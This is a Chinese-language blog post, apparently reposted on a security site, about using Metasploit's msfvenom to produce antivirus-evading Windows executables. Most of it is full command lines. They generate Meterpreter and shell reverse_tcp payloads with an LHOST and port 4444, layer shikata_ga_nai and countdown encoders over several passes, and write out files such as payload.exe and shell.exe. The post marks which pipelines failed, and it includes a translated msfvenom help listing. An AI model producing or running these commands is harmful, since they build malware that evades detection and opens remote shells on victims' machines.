Metasploit之反反病毒

颓废 2019年5月19日10:07:05评论563 views字数 2475阅读8分15秒阅读模式

Metasploit之反反病毒(免杀)
参考文献:https://zhidao.baidu.com/question/497442462224943404.html(msfvenom使用多种编码)
          https://my.oschina.net/u/1585857/blog/500183(使用工具Veil生成木马,需安装)
          http://www.evil0x.com/posts/9492.html(kali2.0-msfvenom 使用简介,比较详细)

实例如下:
------------------------------------------------------------------------------------------------
msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/jmp_call_additive LHOST=192.168.2.14 | msfvenom -e x86/shikata_ga_nai -a x86 -platform windows -f exe > meter.exe
PS:出现错误--无效的有效负载选择

msfvenom -p windows/shell/reverse_tcp -f raw -e x86/jmp_call_additive LHOST=192.168.2.146 | msfvenom -e x86/shikata_ga_nai -a x86 -platform windows -f exe > litteryi.exe
PS:出现错误--无效的有效负载选择

msfvenom -p windows/meterpreter/reverse_tcp -f raw  LHOST=192.168.2.146 -e x86/shikata_ga_nai -a x86 -platform windows -f exe > meter.exe
PS:出现错误--选择了无效载荷

以上几种无效命令,需要进一步去解决,找出出错原因(关于管道命令“|”)

PS:后续有师兄测试了两天得出一个可行的管道命令,如下:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -f raw -e x86/shikata_ga_nai -i 5 | /msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | /msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f exe -o payload.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -f raw -e x86/shikata_ga_nai -i 5 | /msfvenom -a x86 --platform windows -e x86/countdown -i 8  -f raw | /msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f exe -o payload.exe

------------------------------------------------------------------------------------------------
有效生成:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=4444 R -e x86/shikata_ga_nai -i 3 -f exe -o shell.exe
PS:-i  使用同一种编码方式编码3次
    -f  生成的文件格式
    -o  生成文件路径,这里默认跟目录

命令解释:
-p 是选择payload 攻击载荷
-f 是输出文件格式这里是exe文件格式
-e 是选择您的编码器 选什么根据是什么系统来选
                
帮助文档:
-p,--payload <负载>负载使用。指定' - '或标准输入使用自定义负载
    -l,--list [的module_type]列出一个模块类型。选项包括:有效载荷,编码器,空指令,所有
    -n,--nopsled <长度> [长度]大小对有效载荷在前面加上nopsled
    -f,--format <格式>输出格式(使用--help-格式列表)
    -e,--encoder [编码器]编码器使用
    -a,--arch <架构>的架构使用
        --platform <平台>有效载荷的平台
    -s,--space <长度>所得有效负载的最大尺寸
    -b,--bad-字符<列表>字符列表,以避免例如:'/ X00 / XFF“
    -i,--iterations <计数>的次数,以有效负载进行编码
    -c,--add代码<路径>指定一个额外的win32 shellcode的文件,包括
    -x,--template <路径>指定一个自定义的可执行文件作为模板使用
    -k,--keep保存模板行为和有效载荷为一个新的线程注入
        --payload-选项列表中的有效载荷的标准选项
    -o,--out <路径>保存有效载荷
    -v,--var名<名>指定用于某些输出格式的自定义变量名称
    -h,--help显示此消息
        --help-格式列出可用的格式

参考文献:http://www.evil0x.com/posts/9492.html(kali2.0-msfvenom 使用简介,比较详细)

PS:在kali-linux-1.0的时候,msfpayload可以使用,并且有msfencode的编码器,还能使用管道命令,
但是在kali-linux-2.0中这些都没有了。具体对于msf具有哪些功能,可以输入“msf”再两次tab键看详细

msfvenom -l    -->列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日10:07:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Metasploit之反反病毒http://cn-sec.com/archives/67371.html

发表评论

匿名网友 填写信息